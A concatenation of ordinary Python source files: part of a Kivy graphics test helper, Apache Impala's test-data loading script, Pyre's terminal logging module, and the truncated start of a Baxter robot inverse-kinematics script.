log.info('No image reference, move %s as ref ?' % test_uid)
if self.interactive_ask_ref(sourcecodeask, tmpfn, self.id()):
move(tmpfn, reffn)
tmpfn = reffn
log.info('Image used as reference')
match = True
else:
log.info('Image discarded')
else:
from kivy.core.image import Image as CoreImage
s1 = CoreImage(tmpfn, keep_data=True)
sd1 = s1.image._data[0].data
s2 = CoreImage(reffn, keep_data=True)
sd2 = s2.image._data[0].data
if sd1 != sd2:
log.critical(
'%s at render() #%d, images are different.' % (
self.id(), self.test_counter))
if self.interactive_ask_diff(sourcecodeask,
tmpfn, reffn, self.id()):
log.critical('user ask to use it as ref.')
move(tmpfn, reffn)
tmpfn = reffn
match = True
else:
self.test_failed = True
else:
match = True
# generate html
from os.path import join, dirname, exists, basename
from os import mkdir
build_dir = join(dirname(__file__), 'build')
if not exists(build_dir):
mkdir(build_dir)
copy(reffn, join(build_dir, 'ref_%s' % basename(reffn)))
if tmpfn != reffn:
copy(tmpfn, join(build_dir, 'test_%s' % basename(reffn)))
with open(join(build_dir, 'index.html'), 'at') as fd:
color = '#ffdddd' if not match else '#ffffff'
fd.write('<div style="background-color: %s">' % color)
fd.write('<h2>%s #%d</h2>' % (self.id(), self.test_counter))
fd.write('<table><tr><th>Reference</th>'
'<th>Test</th>'
'<th>Comment</th>')
fd.write('<tr><td><img src="ref_%s"/></td>' %
basename(reffn))
if tmpfn != reffn:
fd.write('<td><img src="test_%s"/></td>' %
basename(reffn))
else:
fd.write('<td>First time, no comparison.</td>')
fd.write('<td><pre>%s</pre></td>' % sourcecode)
fd.write('</table></div>')
finally:
try:
if reffn != tmpfn:
unlink(tmpfn)
except:
pass
EventLoop.stop()
def tearDown(self, fake=False):
'''When the test is finished, stop the application, and unbind our
current flip callback.
'''
from kivy.base import stopTouchApp
from kivy.core.window import Window
from kivy.clock import Clock
Window.unbind(on_flip=self.on_window_flip)
stopTouchApp()
if not fake and self.test_failed:
self.assertTrue(False)
super(GraphicUnitTest, self).tearDown()
def interactive_ask_ref(self, code, imagefn, testid):
from os import environ
if 'UNITTEST_INTERACTIVE' not in environ:
return True
from tkinter import Tk, Label, LEFT, RIGHT, BOTTOM, Button
from PIL import Image, ImageTk
self.retval = False
root = Tk()
def do_close():
root.destroy()
def do_yes():
self.retval = True
do_close()
image = Image.open(imagefn)
photo = ImageTk.PhotoImage(image)
        Label(root, text='The test %s\nhas no reference.' % testid).pack()
        Label(root, text='Use this image as a reference?').pack()
Label(root, text=code, justify=LEFT).pack(side=RIGHT)
Label(root, image=photo).pack(side=LEFT)
Button(root, text='Use as reference', command=do_yes).pack(side=BOTTOM)
Button(root, text='Discard', command=do_close).pack(side=BOTTOM)
root.mainloop()
return self.retval
def interactive_ask_diff(self, code, tmpfn, reffn, testid):
from os import environ
if 'UNITTEST_INTERACTIVE' not in environ:
return False
from tkinter import Tk, Label, LEFT, RIGHT, BOTTOM, Button
from PIL import Image, ImageTk
self.retval = False
root = Tk()
def do_close():
root.destroy()
def do_yes():
self.retval = True
do_close()
phototmp = ImageTk.PhotoImage(Image.open(tmpfn))
photoref = ImageTk.PhotoImage(Image.open(reffn))
        Label(root, text='The test %s\nhas generated a different '
              'image than the reference one.' % testid).pack()
        Label(root, text='Which one is good?').pack()
Label(root, text=code, justify=LEFT).pack(side=RIGHT)
Label(root, image=phototmp).pack(side=RIGHT)
Label(root, image=photoref).pack(side=LEFT)
Button(root, text='Use the new image -->',
command=do_yes).pack(side=BOTTOM)
Button(root, text='<-- Use the reference',
command=do_close).pack(side=BOTTOM)
root.mainloop()
return self.retval
def advance_frames(self, count):
'''Render the new frames and:
* tick the Clock
* dispatch input from all registered providers
* flush all the canvas operations
* redraw Window canvas if necessary
'''
from kivy.base import EventLoop
for i in range(count):
EventLoop.idle()
class UnitTestTouch(MotionEvent):
'''Custom MotionEvent representing a single touch. Similar to `on_touch_*`
methods from the Widget class, this one introduces:
* touch_down
* touch_move
* touch_up
Create a new touch with::
touch = UnitTestTouch(x, y)
then you press it on the default position with::
touch.touch_down()
or move it or even release with these simple calls::
touch.touch_move(new_x, new_y)
touch.touch_up()
'''
def __init__(self, x, y):
'''Create a MotionEvent instance with X and Y of the first
position a touch is at.
'''
from kivy.base import EventLoop
self.eventloop = EventLoop
win = EventLoop.window
super(UnitTestTouch, self).__init__(
# device, (tuio) id, args
self.__class__.__name__, 99, {
"x": x / (win.width - 1.0),
"y": y / (win.height - 1.0),
}
)
def touch_down(self, *args):
self.eventloop.post_dispatch_input("begin", self)
def touch_move(self, x, y):
win = self.eventloop.window
self.move({
"x": x / (win.width - 1.0),
"y": y / (win.height - 1.0)
})
self.eventloop.post_dispatch_input("update", self)
def touch_up(self, *args):
self.eventloop.post_dispatch_input("end", self)
def depack(self, args):
# set MotionEvent to touch
self.is_touch = True
# set sx/sy properties to ratio (e.g. X / win.width)
self.sx = args['x']
self.sy = args['y']
# set profile to accept x, y and pos properties
self.profile = ['pos']
# run depack after we set the values
super(UnitTestTouch, self).depack(args)
class UTMotionEvent(MotionEvent):
def depack(self, args):
self.is_touch = True
self.sx = args['x']
self.sy = args['y']
self.profile = ['pos']
super(UTMotionEvent, self).depack(args)
def async_run(func=None, app_cls_func=None):
def inner_func(func):
if 'mock' == cgl_get_backend_name():
return pytest.mark.skip(
reason='Skipping because gl backend is set to mock')(func)
if sys.version_info[0] < 3 or sys.version_info[1] <= 5:
return pytest.mark.skip(
reason='Skipping because graphics tests are not supported on '
'py3.5, only on py3.6+')(func)
if app_cls_func is not None:
func = pytest.mark.parametrize(
"kivy_app", [[app_cls_func], ], indirect=True)(func)
if kivy_eventloop == 'asyncio':
try:
import pytest_asyncio
return pytest.mark.asyncio(func)
except ImportError:
return pytest.mark.skip(
reason='KIVY_EVENTLOOP == "asyncio" but '
'"pytest-asyncio" is not installed')(func)
elif kivy_eventloop == 'trio':
try:
import trio
from pytest_trio import trio_fixture
func._force_trio_fixture = True
return func
except ImportError:
return pytest.mark.skip(
reason='KIVY_EVENTLOOP == "trio" but '
'"pytest-trio" is not installed')(func)
else:
return pytest.mark.skip(
reason='KIVY_EVENTLOOP must be set to either of "asyncio" or '
'"trio" to run async tests')(func)
if func is None:
return inner_func
return inner_func(func)
|
load-data.py
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This script is used to load the proper datasets for the specified workloads. It loads
# all data via Hive except for parquet data which needs to be loaded via Impala.
# Most ddl commands are executed by Impala.
import collections
import getpass
import logging
import os
import re
import sqlparse
import subprocess
import sys
import tempfile
import time
import traceback
from itertools import product
from optparse import OptionParser
from Queue import Queue
from tests.beeswax.impala_beeswax import *
from threading import Thread
logging.basicConfig()
LOG = logging.getLogger('load-data.py')
LOG.setLevel(logging.DEBUG)
parser = OptionParser()
parser.add_option("-e", "--exploration_strategy", dest="exploration_strategy",
default="core",
help="The exploration strategy for schema gen: 'core', "\
"'pairwise', or 'exhaustive'")
parser.add_option("--hive_warehouse_dir", dest="hive_warehouse_dir",
default="/test-warehouse",
help="The HDFS path to the base Hive test warehouse directory")
parser.add_option("-w", "--workloads", dest="workloads",
help="Comma-separated list of workloads to load data for. If 'all' is "\
"specified then data for all workloads is loaded.")
parser.add_option("-s", "--scale_factor", dest="scale_factor", default="",
help="An optional scale factor to generate the schema for")
parser.add_option("-f", "--force_reload", dest="force_reload", action="store_true",
default=False, help='Skips HDFS exists check and reloads all tables')
parser.add_option("--impalad", dest="impalad", default="localhost:21000",
help="Impala daemon to connect to")
parser.add_option("--hive_hs2_hostport", dest="hive_hs2_hostport",
default="localhost:11050",
help="HS2 host:Port to issue Hive queries against using beeline")
parser.add_option("--table_names", dest="table_names", default=None,
help="Only load the specified tables - specified as a comma-seperated "\
"list of base table names")
parser.add_option("--table_formats", dest="table_formats", default=None,
help="Override the test vectors and load using the specified table "\
"formats. Ex. --table_formats=seq/snap/block,text/none")
parser.add_option("--hdfs_namenode", dest="hdfs_namenode", default="localhost:20500",
help="HDFS name node for Avro schema URLs, default localhost:20500")
parser.add_option("--workload_dir", dest="workload_dir",
default=os.environ['IMPALA_WORKLOAD_DIR'],
help="Directory that contains Impala workloads")
parser.add_option("--dataset_dir", dest="dataset_dir",
default=os.environ['IMPALA_DATASET_DIR'],
help="Directory that contains Impala datasets")
parser.add_option("--use_kerberos", action="store_true", default=False,
help="Load data on a kerberized cluster.")
parser.add_option("--principal", default=None, dest="principal",
help="Kerberos service principal, required if --use_kerberos is set")
options, args = parser.parse_args()
SQL_OUTPUT_DIR = os.environ['IMPALA_DATA_LOADING_SQL_DIR']
WORKLOAD_DIR = options.workload_dir
DATASET_DIR = options.dataset_dir
TESTDATA_BIN_DIR = os.path.join(os.environ['IMPALA_HOME'], 'testdata/bin')
AVRO_SCHEMA_DIR = "avro_schemas"
GENERATE_SCHEMA_CMD = "generate-schema-statements.py --exploration_strategy=%s "\
"--workload=%s --scale_factor=%s --verbose"
# Load data using Hive's beeline because the Hive shell has regressed (HIVE-5515).
# The Hive shell is stateful, meaning that certain series of actions lead to problems.
# Examples of problems due to the statefulness of the Hive shell:
# - Creating an HBase table changes the replication factor to 1 for subsequent LOADs.
# - INSERTs into an HBase table fail if they are the first stmt executed in a session.
# However, beeline itself also has bugs. For example, inserting a NULL literal into
# a string-typed column leads to an NPE. We work around these problems by using LOAD from
# a datafile instead of doing INSERTs.
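# For example, instead of an INSERT such as
#   INSERT INTO TABLE some_table VALUES (NULL);
# the generated statements take the form
#   LOAD DATA INPATH '/path/to/datafile' INTO TABLE some_table;
# (the table and path names above are illustrative only).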
HIVE_CMD = os.path.join(os.environ['HIVE_HOME'], 'bin/beeline')
hive_auth = "auth=none"
if options.use_kerberos:
if not options.principal:
print "--principal is required when --use_kerberos is specified"
exit(1)
hive_auth = "principal=" + options.principal
HIVE_ARGS = '-n %s -u "jdbc:hive2://%s/default;%s" --verbose=true'\
% (getpass.getuser(), options.hive_hs2_hostport, hive_auth)
HADOOP_CMD = os.path.join(os.environ['HADOOP_HOME'], 'bin/hadoop')
def available_workloads(workload_dir):
return [subdir for subdir in os.listdir(workload_dir)
if os.path.isdir(os.path.join(workload_dir, subdir))]
def validate_workloads(all_workloads, workloads):
for workload in workloads:
if workload not in all_workloads:
print 'Workload \'%s\' not found in workload directory' % workload
print 'Available workloads: ' + ', '.join(all_workloads)
sys.exit(1)
def exec_cmd(cmd, error_msg, exit_on_error=True):
ret_val = -1
try:
ret_val = subprocess.call(cmd, shell=True)
except Exception as e:
error_msg = "%s: %s" % (error_msg, str(e))
finally:
if ret_val != 0:
print error_msg
if exit_on_error: sys.exit(ret_val)
return ret_val
def exec_hive_query_from_file(file_name):
if not os.path.exists(file_name): return
hive_cmd = "%s %s -f %s" % (HIVE_CMD, HIVE_ARGS, file_name)
print 'Executing Hive Command: %s' % hive_cmd
exec_cmd(hive_cmd, 'Error executing file from Hive: ' + file_name)
def exec_hbase_query_from_file(file_name):
if not os.path.exists(file_name): return
hbase_cmd = "hbase shell %s" % file_name
print 'Executing HBase Command: %s' % hbase_cmd
exec_cmd(hbase_cmd, 'Error executing hbase create commands')
# KERBEROS TODO: fails when kerberized and impalad principal isn't "impala"
def exec_impala_query_from_file(file_name):
"""Execute each query in an Impala query file individually"""
is_success = True
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
try:
impala_client.connect()
with open(file_name, 'r+') as query_file:
queries = sqlparse.split(query_file.read())
for query in queries:
query = sqlparse.format(query.rstrip(';'), strip_comments=True)
print '(%s):\n%s\n' % (file_name, query.strip())
if query.strip() != "":
result = impala_client.execute(query)
except Exception as e:
print "Data Loading from Impala failed with error: %s" % str(e)
traceback.print_exc()
is_success = False
finally:
impala_client.close_connection()
return is_success
def exec_bash_script(file_name):
bash_cmd = "bash %s" % file_name
print 'Executing Bash Command: ' + bash_cmd
exec_cmd(bash_cmd, 'Error bash script: ' + file_name)
def run_dataset_preload(dataset):
"""Execute a preload script if present in dataset directory. E.g. to generate data
before loading"""
dataset_preload_script = os.path.join(DATASET_DIR, dataset, "preload")
if os.path.exists(dataset_preload_script):
print("Running preload script for " + dataset)
if options.scale_factor > 1:
dataset_preload_script += " " + str(options.scale_factor)
exec_cmd(dataset_preload_script, "Error executing preload script for " + dataset,
exit_on_error=True)
def generate_schema_statements(workload):
generate_cmd = GENERATE_SCHEMA_CMD % (options.exploration_strategy, workload,
options.scale_factor)
if options.table_names:
generate_cmd += " --table_names=%s" % options.table_names
if options.force_reload:
generate_cmd += " --force_reload"
if options.table_formats:
generate_cmd += " --table_formats=%s" % options.table_formats
if options.hive_warehouse_dir is not None:
generate_cmd += " --hive_warehouse_dir=%s" % options.hive_warehouse_dir
if options.hdfs_namenode is not None:
generate_cmd += " --hdfs_namenode=%s" % options.hdfs_namenode
generate_cmd += " --backend=%s" % options.impalad
print 'Executing Generate Schema Command: ' + generate_cmd
schema_cmd = os.path.join(TESTDATA_BIN_DIR, generate_cmd)
error_msg = 'Error generating schema statements for workload: ' + workload
exec_cmd(schema_cmd, error_msg)
def get_dataset_for_workload(workload):
dimension_file_name = os.path.join(WORKLOAD_DIR, workload,
'%s_dimensions.csv' % workload)
if not os.path.isfile(dimension_file_name):
print 'Dimension file not found: ' + dimension_file_name
sys.exit(1)
with open(dimension_file_name, 'rb') as input_file:
match = re.search('dataset:\s*([\w\-\.]+)', input_file.read())
if match:
return match.group(1)
else:
print 'Dimension file does not contain dataset for workload \'%s\'' % (workload)
sys.exit(1)
def copy_avro_schemas_to_hdfs(schemas_dir):
"""Recursively copies all of schemas_dir to the test warehouse."""
if not os.path.exists(schemas_dir):
print 'Avro schema dir (%s) does not exist. Skipping copy to HDFS.' % schemas_dir
return
exec_hadoop_fs_cmd("-mkdir -p " + options.hive_warehouse_dir)
exec_hadoop_fs_cmd("-put -f %s %s/" % (schemas_dir, options.hive_warehouse_dir))
def exec_hadoop_fs_cmd(args, exit_on_error=True):
cmd = "%s fs %s" % (HADOOP_CMD, args)
print "Executing Hadoop command: " + cmd
exec_cmd(cmd, "Error executing Hadoop command, exiting",
exit_on_error=exit_on_error)
def exec_impala_query_from_file_parallel(query_files):
# Get the name of the query file that loads the base tables, if it exists.
# TODO: Find a better way to detect the file that loads the base tables.
create_base_table_file = next((q for q in query_files if 'text' in q), None)
if create_base_table_file:
is_success = exec_impala_query_from_file(create_base_table_file)
query_files.remove(create_base_table_file)
# If loading the base tables failed, exit with a non zero error code.
if not is_success: sys.exit(1)
if not query_files: return
threads = []
result_queue = Queue()
for query_file in query_files:
thread = Thread(target=lambda x: result_queue.put(exec_impala_query_from_file(x)),
args=[query_file])
thread.daemon = True
threads.append(thread)
thread.start()
# Keep looping until the number of results retrieved is the same as the number of
# threads spawned, or until a data loading query fails. result_queue.get() will
# block until a result is available in the queue.
num_fetched_results = 0
while num_fetched_results < len(threads):
success = result_queue.get()
num_fetched_results += 1
if not success: sys.exit(1)
# There is a small window where a thread may still be alive even if all the threads have
# finished putting their results in the queue.
for thread in threads: thread.join()
def invalidate_impala_metadata():
print "Invalidating Metadata"
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
impala_client.connect()
try:
impala_client.execute('invalidate metadata')
finally:
impala_client.close_connection()
if __name__ == "__main__":
# Having the actual command line at the top of each data-load-* log can help
# when debugging dataload issues.
#
LOG.debug(' '.join(sys.argv))
all_workloads = available_workloads(WORKLOAD_DIR)
workloads = []
if options.workloads is None:
print "At least one workload name must be specified."
parser.print_help()
sys.exit(1)
elif options.workloads == 'all':
print 'Loading data for all workloads.'
workloads = all_workloads
else:
workloads = options.workloads.split(",")
validate_workloads(all_workloads, workloads)
print 'Starting data load for the following workloads: ' + ', '.join(workloads)
loading_time_map = collections.defaultdict(float)
for workload in workloads:
start_time = time.time()
dataset = get_dataset_for_workload(workload)
run_dataset_preload(dataset)
generate_schema_statements(workload)
sql_dir = os.path.join(SQL_OUTPUT_DIR, dataset)
assert os.path.isdir(sql_dir),\
("Could not find the generated SQL files for loading dataset '%s'.\
\nExpected to find the SQL files in: %s" % (dataset, sql_dir))
os.chdir(os.path.join(SQL_OUTPUT_DIR, dataset))
copy_avro_schemas_to_hdfs(AVRO_SCHEMA_DIR)
dataset_dir_contents = os.listdir(os.getcwd())
load_file_substr = "%s-%s" % (workload, options.exploration_strategy)
# Data loading with Impala is done in parallel, each file format has a separate query
# file.
create_filename = '%s-impala-generated' % load_file_substr
load_filename = '%s-impala-load-generated' % load_file_substr
impala_create_files = [f for f in dataset_dir_contents if create_filename in f]
impala_load_files = [f for f in dataset_dir_contents if load_filename in f]
# Execute the data loading scripts.
# Creating tables in Impala has no dependencies, so we execute them first.
# HBase table inserts are done via hive, so the hbase tables need to be created before
# running the hive script. Some of the Impala inserts depend on hive tables,
# so they're done at the end. Finally, the Hbase Tables that have been filled with data
# need to be flushed.
exec_impala_query_from_file_parallel(impala_create_files)
exec_hbase_query_from_file('load-%s-hbase-generated.create' % load_file_substr)
exec_hive_query_from_file('load-%s-hive-generated.sql' % load_file_substr)
exec_hbase_query_from_file('post-load-%s-hbase-generated.sql' % load_file_substr)
if impala_load_files: invalidate_impala_metadata()
exec_impala_query_from_file_parallel(impala_load_files)
loading_time_map[workload] = time.time() - start_time
invalidate_impala_metadata()
total_time = 0.0
for workload, load_time in loading_time_map.iteritems():
total_time += load_time
print 'Data loading for workload \'%s\' completed in: %.2fs'\
% (workload, load_time)
print 'Total load time: %.2fs\n' % total_time
|
log.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import contextlib
import copy
import io
import logging
import logging.handlers
import os
import re
import subprocess
import sys
import threading
import time
from pathlib import Path
from types import TracebackType
from typing import Generator, Iterable, Optional, Pattern, Sequence
import click
PERFORMANCE: int = 15
PROMPT: int = 50
SUCCESS: int = 60
LOG: logging.Logger = logging.getLogger(__name__)
stdout: io.StringIO = io.StringIO(newline="")
__handler: Optional["TimedStreamHandler"] = None
class Color:
YELLOW: str = "\033[33m"
RED: str = "\033[31m"
GREEN: str = "\033[32m"
class Format:
BOLD: str = "\033[1m"
CLEAR_LINE: str = "\x1b[0G\x1b[K"
CLEAR: str = "\033[0m"
TRUNCATE_OVERFLOW: str = "\033[?7l"
WRAP_OVERFLOW: str = "\033[?7h"
NEWLINE: str = "\n"
CURSOR_UP_LINE: str = "\x1b[1A"
HIDE_CURSOR: str = "\x1b[?25l"
SHOW_CURSOR: str = "\x1b[?25h"
class Character:
LAMBDA: str = "ƛ"
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__(
"%(asctime)s [PID %(process)d] %(levelname)s %(message)s"
)
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD: float = 0.5
LINE_BREAKING_LEVELS: Sequence[str] = ["ERROR", "WARNING", "SUCCESS"]
_terminate: bool = False
_last_update: float = 0.0
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator: str = ""
self.setLevel(logging.INFO)
self._record: Optional[logging.LogRecord] = None
self._active_lines: int = 0
# Preamble preparing terminal.
click.echo(
Format.NEWLINE
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR,
file=sys.stderr,
nl=False,
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record: logging.LogRecord, age: Optional[float] = None) -> None:
suffix = ""
color: Optional[str] = None
message = record.msg
active_lines = message.count("\n") + 1
truncate = Format.TRUNCATE_OVERFLOW
if record.levelname in self.LINE_BREAKING_LEVELS:
message += "\n"
if record.levelname == "ERROR":
color = "red"
self._record = None
active_lines = 0
truncate = Format.WRAP_OVERFLOW
elif record.levelname == "WARNING":
color = "yellow"
self._record = None
active_lines = 0
truncate = Format.WRAP_OVERFLOW
elif record.levelname == "PROMPT":
color = "yellow"
self._record = None
active_lines = 0
truncate = Format.WRAP_OVERFLOW
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
truncate = Format.WRAP_OVERFLOW
elif age:
if age > 10:
color = "yellow"
if age > 30:
color = "red"
suffix = click.style(" [{:.1f}s]".format(age), fg=color)
else:
self._record = record
self._last_update = time.time()
prompt = click.style(f"{Character.LAMBDA}", fg=color)
new_message = f"{self.clear_lines()}{prompt} {truncate}{message}{suffix}"
timed_record = copy.copy(record)
timed_record.msg = (
f"{click.unstyle(new_message)}\n"
# pyre-ignore[16]: Missing typeshed stub for this API
if click.utils.should_strip_ansi(stream=sys.stderr)
else new_message
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
record = self._record
if record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(record, age)
time.sleep(0.1)
def terminate(self) -> None:
self._terminate = True
if self._active_lines > 0:
click.echo(self.clear_lines(), file=sys.stderr, nl=False)
self._active_lines = 0
# Reset terminal.
click.echo(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR, file=sys.stderr, nl=False)
sys.stderr.flush()
def initialize(noninteractive: bool) -> None:
global __handler
if __handler:
LOG.debug("Log handler already exists, skipping initialization.")
return
if noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
__handler = None
else:
stream_handler = TimedStreamHandler()
__handler = stream_handler
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=[stream_handler])
def start_logging_to_directory(noninteractive: bool, log_directory: str) -> None:
if not noninteractive and log_directory is not None:
if not os.path.exists(log_directory):
os.makedirs(log_directory)
handler = logging.handlers.RotatingFileHandler(
os.path.join(log_directory, "pyre.stderr"),
mode="a",
# Keep at most 5 log files on disk
backupCount=4,
# Limit the size of each log file to 10MB
maxBytes=10 * 1000 * 1000,
)
handler.setFormatter(SectionFormatter())
handler.setLevel(logging.DEBUG)
logger = logging.getLogger()
logger.addHandler(handler)
def cleanup() -> None:
global __handler
handler = __handler
if handler:
handler.terminate()
__handler = None
output = stdout.getvalue()
if output:
click.echo(output, nl=False)
if not output.endswith("\n"):
click.echo()
@contextlib.contextmanager
def configured_logger(noninteractive: bool) -> Generator[None, None, None]:
try:
initialize(noninteractive)
yield
finally:
cleanup()
@contextlib.contextmanager
def file_tailer(file_path: Path) -> Generator[Iterable[str], None, None]:
"""
    This function yields a stream of strings generated by following the last
    part of the given file. In other words, the returned stream behaves roughly
the same as `tail -F`: If the file being watched is left untouched, invoking
`next` on the returned stream will block indefinitely. If the file being
watched gets a line appended to the end of it, invoking `next` on the returned
stream will return the appended line. Leaving the context manager will cause
the returned stream to stop iteration next time `next` is invoked.
This API is intended to be used along with `StreamLogger` to concurrently
forward the content of a log file to the terminal in the background:
```
with file_tailer(log_file) as log_stream:
with StreamLogger(log_stream) as logger:
# Main thread logic happens here
...
logger.join()
```
"""
with subprocess.Popen(
["tail", "-F", "-n", "0", str(file_path)],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
) as tail:
try:
stdout = tail.stdout
if stdout is None:
raise RuntimeError(
"subprocess.Popen failed to set up a pipe for stdout"
)
yield stdout
finally:
tail.terminate()
class StreamLogger:
_should_stop_reading_stream = False
_current_section: Optional[str]
_server_log_pattern: Pattern[str] = re.compile(
r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} (\w+) (.*)"
)
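    # Server log lines are expected to look like (illustrative):
    #   2021-01-01 12:00:00 INFO some message
    # where group 1 is the section name and group 2 is the message body.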
def __init__(self, stream: Iterable[str]) -> None:
self._reader = threading.Thread(target=self._read_stream, args=(stream,))
self._reader.daemon = True
self._current_section = None
def join(self) -> None:
self._reader.join()
def _log_server_stderr_message(self, server_message: str) -> None:
line = server_message.rstrip()
match = self._server_log_pattern.match(line)
if match:
section = match.groups()[0]
message = match.groups()[1]
self._current_section = section
else:
section = self._current_section
message = line
if section == "ERROR":
LOG.error(message)
elif section == "INFO":
LOG.info(message)
elif section == "DUMP":
LOG.warning(message)
elif section == "WARNING":
LOG.warning(message)
elif section == "PROGRESS":
LOG.info(message)
elif section == "PARSER":
LOG.error(message)
elif section is not None:
LOG.debug("[%s] %s", section, message)
else:
LOG.debug(line)
def _read_stream(self, stream: Iterable[str]) -> None:
try:
for line in stream:
if self._should_stop_reading_stream:
return
self._log_server_stderr_message(line)
except Exception:
pass
def __enter__(self) -> "StreamLogger":
self._should_stop_reading_stream = False
self._reader.start()
return self
def __exit__(
self,
_type: Optional[BaseException],
_value: Optional[BaseException],
_traceback: Optional[TracebackType],
) -> None:
self._should_stop_reading_stream = True
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
|
trajectory_ik.py
|
#!/usr/bin/env python
# Copyright (c) 2013-2015, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import argparse
import roslib
import rospy
import threading
import numpy
import baxter_interface
import sys
import signal
import numpy as np
import copy
import math
from geometry_msgs.msg import (
PoseStamped,
Pose,
Point,
Quaternion,
)
from ar_track_alvar_msgs.msg import (
AlvarMarkers)
from tf.transformations import *
from baxter_examples import IKSolver
from baxter_interface import CHECK_VERSION
def signal_handler(signal, frame):
poseToJoints._end_thread = True
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
class PoseToJoints(object):
def __init__(self, filename, limb):
print("Initializing node... ")
rospy.init_node("rsdkPoseToJoints")
print("Getting robot state... ")
rs = baxter_interface.RobotEnable(CHECK_VERSION)
print("Enabling robot... ")
rs.enable()
self._filename = filename
self._start_time = rospy.get_time()
self._limb = limb
self._limb_left = baxter_interface.Limb("left")
self._limb_right = baxter_interface.Limb("right")
self._left_names = self._limb_left.joint_names()
self._right_names = self._limb_right.joint_names()
self._gripper_left = baxter_interface.Gripper('left', CHECK_VERSION)
self._gripper_right = baxter_interface.Gripper('right', CHECK_VERSION)
self._gripper_left_status = 1
self._gripper_right_status = 1
self._rate = rospy.Rate(200)
        self._execution_timeout = 1000 # milliseconds
        self._execution_start = rospy.get_time() # milliseconds
self._left_ik_solver = IKSolver('left')
self._right_ik_solver = IKSolver('right')
self._initial_right_pose = Pose()
self._initial_left_pose = Pose()
self._end_thread = False
self.thread = threading.Thread(target=self._update_thread)
self.thread.start()
if(limb == 'left' or limb == 'both'):
rospy.Subscriber("/robot/limb/left/endpoint_state", PoseStamped, self.left_end_callback)
if(limb == 'right' or limb == 'both'):
rospy.Subscriber("/robot/limb/right/endpoint_state", PoseStamped, self.right_end_callback)
rospy.Subscriber("/ar_pose_marker", AlvarMarkers, self.objects_pose_callback)
self._executed = True
print 'initialized'
def _time_stamp(self):
return rospy.get_time() - self._start_time
def try_float(self, x):
try:
return float(x)
except ValueError:
return None
def execute(self, limb, pose):
# print pose[1:8]
pose[1:8] = self.transform_unity_to_baxter(pose[1:8])
# print self.transform_baxter_to_unity(pose[1:8])
if limb == 'left':
self._left_ik_solver.solve(pose[1:4], pose[4:8])
            if self._gripper_left_status > .5 and pose[0] < .5:
